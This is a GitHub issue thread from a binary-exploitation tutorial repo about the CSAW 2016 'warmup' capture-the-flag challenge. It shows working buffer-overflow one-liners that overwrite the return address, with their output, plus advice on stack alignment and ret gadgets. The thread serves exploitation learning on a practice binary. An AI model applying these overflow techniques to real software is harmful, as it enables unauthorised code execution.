### ISSUE TITLE
Exploit for csaw16_warmup not working.

### ISSUE THREAD

**Issue by rudrasingh99** [guyinatuxedo/nightmare#6]
Hi,

First of all great repo and thanks for putting your time into it.

I have been working on warmup binary and at the end of it I came to the conclusion that :

Our buffer is stored at `0x7fffffffdef0` and to reach rbp it would need ` $rbp - 0x7fffffffdef0` i.e `0x40 bytes` and to reach RIP it would need `rbp+8` bytes i.e `0x48 bytes`.

But the exploit isn't working for `0x48` i.e `72` bytes and when I tried to debug the binary it worked with` 0x40bytes + ret address ` for easy func.

I don't understand why it worked with total 72 bytes and not 72bytes + ret.

Please help me out here.

**Comment by rudrasingh99** [comment]
> rudra@0xrudra:~/Desktop/Playground/csaw16_warmup$ python -c "import pwn;print 'A' * 64 + pwn.p64(0x40060d)" | ./warmup
-Warm Up-
WOW:0x40060d
>WINWIN
-Warm Up-
WOW:0x40060d


Whereas 


> >rudra@0xrudra:~/Desktop/Playground/csaw16_warmup$ python -c "import pwn;print 'A' * 72 + pwn.p64(0x40060d)" | ./warmup
-Warm Up-
WOW:0x40060d
>Segmentation fault (core dumped)

**Comment by D4mianWayne** [comment]
@rudrasingh99 Let me guess, you're on Ubuntu 18.04/16.04, try the payload as `"A"*72 + single_ret_found_by_ropper + return_addr_of_function_you_want_to_jump`
For further details, contact me at Telegram, username: @D4mianWayne.

**Comment by Hamled** [comment]
I was running into this same issue, and after some investigation with GDB it appears that the segfault is happening in the `do_system` function in glibc, rather than from not having the return address overwritten correctly.

An explanation of why the segfault is happening in glibc can be found here: https://ropemporium.com/guide.html#Common%20pitfalls

As per their instructions to find a return address which skips a `push` instruction, I was able to modify the desired return address from `0x40060d` to `0x40060e`. This skips the first instruction in the `easy` function, which is a `push`.

With that change the `system` call works and the flag is printed. Hope this helps!

**Comment by guyinatuxedo** [comment]
Hello, thank you for the issue. I see what you mean with the offset being 0x40 instead of 0x48. It looks like something to do with different environments the binary is ran in affecting that. Just to be sure I double checked other writeups for the same problem, and the supposed correct offset is `0x48`, so it looks like it's an issue with the environment the binary is ran in causing the difference in offset. Thank you and have a nice day!

**Comment by guyinatuxedo** [comment]
Also, I pushed a comment for that writeup mentioning this.
